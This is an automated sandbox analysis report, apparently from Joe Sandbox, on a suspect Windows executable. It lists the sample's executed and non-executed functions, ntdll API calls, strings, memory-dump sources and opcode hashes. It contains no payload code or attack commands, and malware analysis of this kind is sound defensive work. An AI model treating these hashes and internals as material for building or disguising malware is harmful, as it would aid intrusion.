Instruction ID: bac7f087fa5525c4eedaf07bd7b4cc4bbc79f7c6ca3fcd44a32a84954f943b61
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: BD11BE75504240DFDB02CF94C5C4B19BF72FB84624F24C6AED8498F256C33AD40ACB91

Analysis Process: TBsjWljiCpR.exePID: 7908, Parent PID: 7680COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	55.6%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	1

Executed Functions

Function 00417393 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417405

Memory Dump Source

Source File: 0000000D.00000002.2030469230.0000000000417000.00000040.00000400.00020000.00000000.sdmp, Offset: 00417000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_417000_TBsjWljiCpR.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 3e1e084428a271c5e890f20eadbc4fdd9c42662fc0071a7a85dff5490e354e7b
Instruction ID: 983eccb0d9070b947cec14170c1ff7600f84878ffbb2ec511f095524d7b6e595
Opcode Fuzzy Hash: 3e1e084428a271c5e890f20eadbc4fdd9c42662fc0071a7a85dff5490e354e7b
Instruction Fuzzy Hash: DD015EB1E0020DABDB10DBA1DC42FDEB7B89B54308F0041AAED0897240F634EB54CBA5

Function 01082C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0109FD4F,000000FF,00000024,01136634,00000004,00000000,?,-00000018,7D810F61,?,?,01058B12,?,?,?,?), ref: 01082C24

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 704f8b56239ead652321a688aa47b328adc40aefb93deda80e4a33cc087fb9bd
Instruction ID: cbb2070278f2b114879785ac73106817420e1d0971755c657c0f1ea9d2f45f07
Opcode Fuzzy Hash: 704f8b56239ead652321a688aa47b328adc40aefb93deda80e4a33cc087fb9bd
Instruction Fuzzy Hash: CDB09B719055C9C5EF51F7644608717794077D1701F15C062D2C34655F473CC1D1F275

Function 01082DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(010BE73E,0000005A,0111D040,00000020,00000000,0111D040,00000080,010A4A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0108AE00), ref: 01082DFA

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9178fd1a6dbfe9cabca383aebcf6ad82dd2c44d4efce09455d299a28285590dd
Instruction ID: 87df3c3ab795596314f7a556f9e4f620de3d2ca3b10aebbd214f41fa41730dfa
Opcode Fuzzy Hash: 9178fd1a6dbfe9cabca383aebcf6ad82dd2c44d4efce09455d299a28285590dd
Instruction Fuzzy Hash: F190023120140813E61171588514707000997D1241F95C413A0C28568DD65A8A52B225

Function 010835C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 010835CA

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 850f3d2ad865d4771aa63d3ea9fb5361721061bbed11d88266596e4c096bb750
Instruction ID: 69d9f9924e0038b548aa1cc6a15490910e53ede3ad98363af9ea02ab3292ba44
Opcode Fuzzy Hash: 850f3d2ad865d4771aa63d3ea9fb5361721061bbed11d88266596e4c096bb750
Instruction Fuzzy Hash: 0C90023160550802E60071588524706100597D1201F65C412A0C28578DC7998A5176A6

Function 0042C9C2 Relevance: 1.3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-, xrefs: 0042C9F0

Memory Dump Source

Source File: 0000000D.00000002.2030469230.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_42c000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c6ee633267a878b40835b07d4c4ca9aa5c8ac0897a90da318a48d344567ceb94
Instruction ID: 88d257e0854cd768d6dba5198ae718d0779cb98b7893b10a5d5ca2d04ff058eb
Opcode Fuzzy Hash: c6ee633267a878b40835b07d4c4ca9aa5c8ac0897a90da318a48d344567ceb94
Instruction Fuzzy Hash: 0C018BB1D4022856FB30E751AD46FDD7378AB08704F5446EFB50CA61C2FB78B7484A99

Function 0042C9C3 Relevance: 1.3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-, xrefs: 0042C9F0

Memory Dump Source

Source File: 0000000D.00000002.2030469230.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_42c000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ce8ca0beccd1764452cf9062150c588957ac11f6d0ff98cc246ca25508a3d8d4
Instruction ID: 6153b4f35f177dced3b66cbd74bda2f97e5bf28219daec65268550cee01439e7
Opcode Fuzzy Hash: ce8ca0beccd1764452cf9062150c588957ac11f6d0ff98cc246ca25508a3d8d4
Instruction Fuzzy Hash: 2F018BB1D4022856FB30E751AD46FDD7378AB08704F5446EFB50CA61C2FB78A7484A99

Function 0042CD34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.2030469230.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_42c000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 010cf97c265dc07d914d9a0d992fd91e9cbdca07d7a3a8ebd4ad70c05ecb2631
Instruction ID: 515bb7c842c99ea99d99ea3436b1cfd9b584a002d758f00a04f6bd7bc1229200
Opcode Fuzzy Hash: 010cf97c265dc07d914d9a0d992fd91e9cbdca07d7a3a8ebd4ad70c05ecb2631
Instruction Fuzzy Hash: 57F017B6110248AFDB04DF59D881FDA73A9FB88750F04C159F9298B201DB74EA10CBA0

Function 0042CE99 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.2030469230.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_42c000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5140d62d809f287d54f705588f3d95636fe842aa2e8777a0388e89d67eec686
Instruction ID: 0e5cdf4b054597146475ec73383ccf6b51dbeb62fff020d369890f564f11a403
Opcode Fuzzy Hash: d5140d62d809f287d54f705588f3d95636fe842aa2e8777a0388e89d67eec686
Instruction Fuzzy Hash: 49E0D873B41224B7C520554EAC46F5BB75DDBD1F70F55801AFE0C9B300E668AD0082E8

Function 0042CD43 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.2030469230.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_42c000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f5ebd0ce095c94032939ebca828dd3e7bc2bbad66f67eb8d74ca2512b72b2a7
Instruction ID: 9fae1cfe710d47d701c0aa0de47d5bb09a5ab7c146ef34698ac3eed256981256
Opcode Fuzzy Hash: 2f5ebd0ce095c94032939ebca828dd3e7bc2bbad66f67eb8d74ca2512b72b2a7
Instruction Fuzzy Hash: B4F0ACB6610209AFDB04CF59D881EDB77A9FB88750F04C559FD298B241D774EA10CBA0

Function 0042CEA3 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.2030469230.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_42c000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 524cf9ca59951938721b9f9fd59d850e51e9ba287c1da63ffe7167f60211383e
Instruction ID: 782793fdd63bfb1746c1d14d5b6f3c4d93ee122047067fbbe9ec9ebc3b5d4fd5
Opcode Fuzzy Hash: 524cf9ca59951938721b9f9fd59d850e51e9ba287c1da63ffe7167f60211383e
Instruction Fuzzy Hash: 63E08676B4023477C621558AAC46F5BB75DDBC1FB0F56402AFE0C9B341E6A8AD0082EC

Function 0042CDC2 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.2030469230.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_42c000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe1264b1bab2da09e0f93bef8a5b3b46dd0a983f23a70ae55840e8b72d213e66
Instruction ID: f246f88eb074cd09e927943bb3cc6e6094fde4f99440bf5cd51b6d3268422675
Opcode Fuzzy Hash: fe1264b1bab2da09e0f93bef8a5b3b46dd0a983f23a70ae55840e8b72d213e66
Instruction Fuzzy Hash: 1DC012756103087BD640DB98EC46F5533AC9708720F408045B90C8B241D571F95046A4

Function 0042CDC3 Relevance: .0, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.2030469230.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_42c000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a9125be4f4a9e8d98c47a1582583a37910ed88436ef4da4df7bbe78c5a3b18
Instruction ID: 05e690adfeac1179ceeef709abfb0cdbd8106169eb875cbf0fae4d1b196df349
Opcode Fuzzy Hash: 50a9125be4f4a9e8d98c47a1582583a37910ed88436ef4da4df7bbe78c5a3b18
Instruction Fuzzy Hash: 80C012756103086BD640DB88DC46F1533AC9708620F408045B90C8B241D570F91046A4

Non-executed Functions

Function 01082890 Relevance: 9.2, APIs: 6, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 0108293C
___swprintf_l.LIBCMT ref: 0108295E
___swprintf_l.LIBCMT ref: 010829A3
___swprintf_l.LIBCMT ref: 010BA52E

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: 679f5d4b00d24db3f61c644d6624c57ed557f39a87b3bc1c2039267779385d2d
Instruction ID: ffa97f818d90a04fbffcf25d32b731d9660d01a52c319143d3d3e62808785a3c
Opcode Fuzzy Hash: 679f5d4b00d24db3f61c644d6624c57ed557f39a87b3bc1c2039267779385d2d
Instruction Fuzzy Hash: ED51D5B1A04116BECF21EB9D88909BEFBF8BB49240B108269F4E5D7645D334DE50CBA0

Function 0105A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON

Download Yara Rule

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010A79FA
SsHd, xrefs: 0105A3E4
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010A79D5
RtlpFindActivationContextSection_CheckParameters, xrefs: 010A79D0, 010A79F5

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-929470617
Opcode ID: f1f06af985ec6aab1af2384f26d677c91438f63725ea18f5ceacf2211c98d0dc
Instruction ID: a9c28320821471705767efc5f700abf6e5ba05f03f6aa1e3506625d79c92e045
Opcode Fuzzy Hash: f1f06af985ec6aab1af2384f26d677c91438f63725ea18f5ceacf2211c98d0dc
Instruction Fuzzy Hash: 18E1D030704302CFD7A5CE68C494B6BBBE1AB88254F144B6DFDD5CB291D732D9458B92

Function 0105D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010A948C

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010A936B
GsHd, xrefs: 0105D874
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010A9346
RtlpFindActivationContextSection_CheckParameters, xrefs: 010A9341, 010A9366

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-576511823
Opcode ID: 50265c81494cf528ca43bd50c9876da053baa16cfb0e3314164855568b92775d
Instruction ID: d34ac50be1b29242d71f240ed74b41320d15b8b27b5037ec7629054eaece74aa
Opcode Fuzzy Hash: 50265c81494cf528ca43bd50c9876da053baa16cfb0e3314164855568b92775d
Instruction Fuzzy Hash: 23E1A3756043429FDBA0CFA8C480B6BBBF5BF88318F444A6EE9D58B281D771D944CB52

Function 0108B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0108B6BF

Strings

+, xrefs: 0108B65A
0, xrefs: 0108B66F
-, xrefs: 0108B650
0, xrefs: 0108B695

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction ID: 61f518a12e3ec88969e4157439b77b62781a417eeefb9c717d0795b60a81f6c7
Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction Fuzzy Hash: 9881C030E192499EEF25BE6CC8507FEBFE1BF49324F184299D8E1A7291C7349851CB51

Function 01049126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010A2559

Strings

@, xrefs: 01049175
$, xrefs: 01049191

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 9f00196e3a5da280c10b8f5e38776f21f4345b88f64a5980303b34549dccccbe
Instruction ID: 1d952e5b8cdb0dbb9e2b33f4b586268379347f689671834008f0bad7b701122a
Opcode Fuzzy Hash: 9f00196e3a5da280c10b8f5e38776f21f4345b88f64a5980303b34549dccccbe
Instruction Fuzzy Hash: BE812C71D002699BDB75DB94CC44BEEBBB8AF08754F0041EAEA59B7250D7309E84CFA0

Function 0106DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010AF611

Strings

, passed to %s, xrefs: 010AF662
Invalid heap signature for heap at %p, xrefs: 010AF653
RtlUnlockHeap, xrefs: 010AF65D

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-56086060
Opcode ID: a291bf520918b07c6cea71a310a43f1fbe0a0c7529f6b86ce5ca33bee2e61e9c
Instruction ID: 2fbc8268ddd5fad7151f5f9cd6dfbea1552dc9008a4f6a9b99fbaa58ac80c979
Opcode Fuzzy Hash: a291bf520918b07c6cea71a310a43f1fbe0a0c7529f6b86ce5ca33bee2e61e9c
Instruction Fuzzy Hash: 67415531600642DFD722DFA8C495BAEB7F8FF45324F0481A9E5C18B695CB78A880C790

Function 010C4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010C4809

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 010C4888
minkernel\ntdll\ldrredirect.c, xrefs: 010C4899
LdrpCheckRedirection, xrefs: 010C488F

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: f696380f59fb5e041bf1876e9b18cfb6d2fd287bd1151e19829c10ea34d20d5c
Instruction ID: 5e08eb7cde2a018dfe680f2bb1e0b4c2f67fd32b9db0e2843680cac7511a583e
Opcode Fuzzy Hash: f696380f59fb5e041bf1876e9b18cfb6d2fd287bd1151e19829c10ea34d20d5c
Instruction Fuzzy Hash: 23419032A046519BCB61CF58D860A6F7BE4FF49E50B0506ADEDD8DB215D730D804CF91

Function 0106DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010AF757

Strings

RtlLockHeap, xrefs: 010AF7A3
, passed to %s, xrefs: 010AF7A8
Invalid heap signature for heap at %p, xrefs: 010AF799

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-3526935505
Opcode ID: bf2c8859552a75f8d49f9642d19a55e0ca0156d5e59390558d10741bec48eae8
Instruction ID: c9c8bf9d6394471928a6d025dea9de8a011c63548295fa895fa14aa88f5d0f96
Opcode Fuzzy Hash: bf2c8859552a75f8d49f9642d19a55e0ca0156d5e59390558d10741bec48eae8
Instruction Fuzzy Hash: 2A310931214789DFD767DBACC809B9E7BE8FF01764F044099E4D68B65ACBB8A880C751

Function 0103C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0103C0B4
RtlDebugPrintTimes.NTDLL ref: 0109D623
RtlDebugPrintTimes.NTDLL ref: 0109D651

Strings

$, xrefs: 0103C07C

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
